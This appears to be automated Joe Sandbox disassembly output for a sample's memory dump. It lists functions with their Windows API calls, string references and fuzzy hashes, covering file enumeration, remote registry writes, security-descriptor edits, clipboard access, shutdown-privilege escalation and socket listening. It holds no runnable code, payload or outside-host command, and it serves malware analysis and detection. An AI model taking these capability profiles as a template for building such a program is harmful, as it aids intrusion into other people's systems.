__swprintf.LIBCMT ref: 00AECED3
__swprintf.LIBCMT ref: 00AECF16

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

__swprintf.LIBCMT ref: 00AECF6A

Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921

__swprintf.LIBCMT ref: 00AECFB8

Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA3943
Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA395B

__swprintf.LIBCMT ref: 00AED007
__swprintf.LIBCMT ref: 00AED056
__swprintf.LIBCMT ref: 00AED0A5

Strings

%4d, xrefs: 00AECF10
%4d%02d%02d%02d%02d%02d, xrefs: 00AECECD
%02d, xrefs: 00AECF5E, 00AECF68, 00AECFB6, 00AED005, 00AED054, 00AED0A3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: cbd7d25a15a303dbc00d9834d1c4538ddd941a9b0534e8e121964206e382304c
Instruction ID: 79766f632569b2411f109f9ee61d622aef513cc15efba6ce5729100eb7763db3
Opcode Fuzzy Hash: cbd7d25a15a303dbc00d9834d1c4538ddd941a9b0534e8e121964206e382304c
Instruction Fuzzy Hash: D5A13CB2508345ABC714FFA4CA85DAFB7ECEF98704F400919F58587191EB74EA09CB62

Function 00AEF5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00AEF5F9
_wcscmp.LIBCMT ref: 00AEF60E
_wcscmp.LIBCMT ref: 00AEF625
GetFileAttributesW.KERNEL32(?), ref: 00AEF637
SetFileAttributesW.KERNEL32(?,?), ref: 00AEF651
FindNextFileW.KERNEL32(00000000,?), ref: 00AEF669
FindClose.KERNEL32(00000000), ref: 00AEF674
FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF690
_wcscmp.LIBCMT ref: 00AEF6B7
_wcscmp.LIBCMT ref: 00AEF6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF6E0
SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF708
FindClose.KERNEL32(00000000), ref: 00AEF715
FindClose.KERNEL32(00000000), ref: 00AEF727

Strings

*.*, xrefs: 00AEF68B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
Instruction ID: a39a12f7ac5934ebdc4dfff1d67ca53316b53c79780bd0e3c3040b29936ea73e
Opcode Fuzzy Hash: b4358540e0764c84b2dd5db9b8964d684c1dff5aa65e52d687f9203fb6a67350
Instruction Fuzzy Hash: 3B31B372641259AFDF10EFB5AC59AEE77ACDF09321F5041A5F804E30A0EF74DA84CA60

Function 00B00EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B10980,00000000,?,00000000,?,?), ref: 00B01021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B01069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B010F2
RegCloseKey.ADVAPI32(?), ref: 00B01412
RegCloseKey.ADVAPI32(00000000), ref: 00B0141F

Strings

REG_QWORD, xrefs: 00B01360
REG_DWORD, xrefs: 00B012E3
REG_BINARY, xrefs: 00B013AD
REG_MULTI_SZ, xrefs: 00B011DA
REG_SZ, xrefs: 00B01130
REG_EXPAND_SZ, xrefs: 00B0108F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c62216011ed2ed2a8bb6de0fd3c40cf993b91a33ddfeebd1db1b44f83b4abdcc
Instruction ID: 0157368f75a130f5ace867b07d64a6f91a6bc837548b540a12e1c8be55ecf997
Opcode Fuzzy Hash: c62216011ed2ed2a8bb6de0fd3c40cf993b91a33ddfeebd1db1b44f83b4abdcc
Instruction Fuzzy Hash: 4B028F752046029FCB14EF29C981E2ABBE5FF89714F04895DF85A9B3A1DB30EC41CB91

Function 00AEF735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00AEF756
_wcscmp.LIBCMT ref: 00AEF76B
_wcscmp.LIBCMT ref: 00AEF782

Part of subcall function 00AE4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AE4890

FindNextFileW.KERNEL32(00000000,?), ref: 00AEF7B1
FindClose.KERNEL32(00000000), ref: 00AEF7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF7D8
_wcscmp.LIBCMT ref: 00AEF7FF
_wcscmp.LIBCMT ref: 00AEF816
SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF828
SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF850
FindClose.KERNEL32(00000000), ref: 00AEF85D
FindClose.KERNEL32(00000000), ref: 00AEF86F

Strings

*.*, xrefs: 00AEF7D3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
Instruction ID: 1d1e2cd1fdc405e9680cf9be35be3d0411c235c3c9c078cbb28b14674084f31b
Opcode Fuzzy Hash: 938830d2de86aa94d26c41d3358c0904bc163287b0ce217d438118f98a4fcc12
Instruction Fuzzy Hash: 0531927250025AAEDB10AFB6DC59AEE77ACDF09321F1041A5F904A31A0DB70DE858A60

Function 00AD88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73

Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8931
_memset.LIBCMT ref: 00AD8946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8965
GetLengthSid.ADVAPI32(?), ref: 00AD8976
GetAce.ADVAPI32(?,00000000,?), ref: 00AD89B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD89CF
GetLengthSid.ADVAPI32(?), ref: 00AD89EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD89FB
HeapAlloc.KERNEL32(00000000), ref: 00AD8A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8A23
CopySid.ADVAPI32(00000000), ref: 00AD8A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8A95

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
Instruction ID: 2372a81eda0b28e439d7e74801b2922c0008dea72dbe742bff2e16c150dfe883
Opcode Fuzzy Hash: 49c0694cd70fc63c43d7ae606d0a1bd1e05cf2b171b70c62e14e70b4723fb4cb
Instruction Fuzzy Hash: 82612875910209BFDF00DFA5DC45AEEBB79FF04300F04812AF956A72A0DB799A55CB60

Function 00B00A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B00B0C

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B00BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B00C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B00E82
RegCloseKey.ADVAPI32(00000000), ref: 00B00E8F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 1621f4b68b71e2e97c23282b8934bcfc51397d032e194e36ceeb674822a9db70
Instruction ID: 7e7a856659c8892f4cba781e5e0f6aada2f414666fe5f16b8cd0a4e066d67e81
Opcode Fuzzy Hash: 1621f4b68b71e2e97c23282b8934bcfc51397d032e194e36ceeb674822a9db70
Instruction Fuzzy Hash: 8BE17F31614205AFCB14EF28C995E6ABBE5FF89714F0489ADF44ADB2A1DB30ED01CB51

Function 00AE443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00AE4451
__swprintf.LIBCMT ref: 00AE445E

Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00AE4488
LoadResource.KERNEL32(?,00000000), ref: 00AE4494
LockResource.KERNEL32(00000000), ref: 00AE44A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00AE44C1
LoadResource.KERNEL32(?,00000000), ref: 00AE44D3
SizeofResource.KERNEL32(?,00000000), ref: 00AE44E2
LockResource.KERNEL32(?), ref: 00AE44EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AE454F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
Instruction ID: 761d1cc266ef443a0f8968b0df8572d94229c193405c197b5a60da1e31650683
Opcode Fuzzy Hash: a24556327d73be4477278b4193869d4fbe4d96dc7ae94caf3ec69ed5a12f768e
Instruction Fuzzy Hash: F1318E7160125AABDB11AF61ED48ABF7BACFB09301F408425F912D7150DB74DE50CAB0

Function 00AF4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00AF4857
EmptyClipboard.USER32 ref: 00AF485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00AF4872
CloseClipboard.USER32 ref: 00AF4911

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
Instruction ID: 9a2f9202f1e4fd1cc3b6bc1d1b5b30341c34903aaceb58f99cbb3ac6f7ea3817
Opcode Fuzzy Hash: 9ce11b021aed973167225765d66e3c187d4791bb403ab847335e2a05e9c45345
Instruction Fuzzy Hash: 0E21A1312052159FDB01BF64ED49B6E77A8EF88721F008019FA069B2A1DFB0AD50CB94

Function 00AEFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AEFA83
FindClose.KERNEL32(00000000), ref: 00AEFB96

Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6

Sleep.KERNEL32(0000000A), ref: 00AEFAB3
_wcscmp.LIBCMT ref: 00AEFAC7
_wcscmp.LIBCMT ref: 00AEFAE2
FindNextFileW.KERNEL32(?,?), ref: 00AEFB80

Strings

*.*, xrefs: 00AEFA68

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
Instruction ID: 551ae5fe0c37e6d61b01301717388f15272f09623a767e4e8430fa692ee6025e
Opcode Fuzzy Hash: 404026fd22709555525fd043264d74c6c1dc47464f628504031e88d13b674193
Instruction Fuzzy Hash: 0341817194025AAFCF14DF65CD59AEEBBB8FF05350F548166F814A32A1EB309E84CB90

Function 00AE5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D

ExitWindowsEx.USER32(?,00000000), ref: 00AE57B4

Strings

SeShutdownPrivilege, xrefs: 00AE5784
, xrefs: 00AE57A2
@, xrefs: 00AE57A7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
Instruction ID: e3152a27dd9a5abf8797c7b2302ad7412285eed8a2e443c51ae6b479b77e3375
Opcode Fuzzy Hash: e721262ad05997935b8691677d104cd68df0dd9c3aa12ff0c8e4f795375d2182
Instruction Fuzzy Hash: BF01F731E50756EAE7286377BC8ABBB7268AB05748F24082AF953D70D2DE505C608150

Function 00AF696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AF69C7
WSAGetLastError.WSOCK32(00000000), ref: 00AF69D6
bind.WSOCK32(00000000,?,00000010), ref: 00AF69F2
listen.WSOCK32(00000000,00000005), ref: 00AF6A01
WSAGetLastError.WSOCK32(00000000), ref: 00AF6A1B
closesocket.WSOCK32(00000000,00000000), ref: 00AF6A2F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
Instruction ID: 11ff48fb67b9397f4254dacc3b628392fa9af721353e0d11add09defde0549cf
Opcode Fuzzy Hash: c3e5313ecd021c791df899781dedd168576626e5260461eac3cfe54dc5697ca1
Instruction Fuzzy Hash: B8219E306006059FCB10FFA8C989A7EB7B9EF48724F148659F956A73E1DB70AC41CB91

Function 00A81663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A81DD6
GetSysColor.USER32(0000000F), ref: 00A81E2A
SetBkColor.GDI32(?,00000000), ref: 00A81E3D

Part of subcall function 00A8166C: DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
Instruction ID: 9a6ca7a4f13cab923abbe56785d79b75f8f97104a88b6e336fca80e322c46f42
Opcode Fuzzy Hash: 22b794f2e1eefbe508c1aa68618d2d0775d66d84d1597adc1d6fd11e355b86f9
Instruction Fuzzy Hash: ACA123B4125404BBE628BBA98C49FBF3EADEB46341F24460AF402D61D2DF659D03D376

Function 00AEC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AEC329
_wcscmp.LIBCMT ref: 00AEC359
_wcscmp.LIBCMT ref: 00AEC36E
FindNextFileW.KERNEL32(00000000,?), ref: 00AEC37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AEC3AF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 4dd4294185aef1178520a1d78cf7b948de02779ec452810da133fb8c9847423d
Instruction ID: b3b13407ad4320c9cd50a7ad8277f858afd22e43ae8001c2875ecf6b146b41a9
Opcode Fuzzy Hash: 4dd4294185aef1178520a1d78cf7b948de02779ec452810da133fb8c9847423d
Instruction Fuzzy Hash: E8519A756046029FC714EF69C591EAAB3E8FF49320F10861DF95A8B3A1DB30ED05CB91

Function 00AF6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AF6E89
WSAGetLastError.WSOCK32(00000000), ref: 00AF6EB2
bind.WSOCK32(00000000,?,00000010), ref: 00AF6EEB
WSAGetLastError.WSOCK32(00000000), ref: 00AF6EF8
closesocket.WSOCK32(00000000,00000000), ref: 00AF6F0C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
Instruction ID: e830fbe02662b6b2b9a80afc3f8fa3223b542ebce2ecd5dbe5ff19fd629fb052
Opcode Fuzzy Hash: 3ca34e94f80d7f34fe6edfd3b67a20549c813f4ef1832b25cbc49a9bdad41e35
Instruction Fuzzy Hash: 1541D375600215AFDB10BFA4DD86F7E77A8DF48724F048558FA16AB3D2EA709D008BA1

Function 00B059B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B05A02
IsWindowEnabled.USER32 ref: 00B05A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00B05A1D
IsIconic.USER32 ref: 00B05A2B
IsZoomed.USER32 ref: 00B05A39

Memory Dump Source

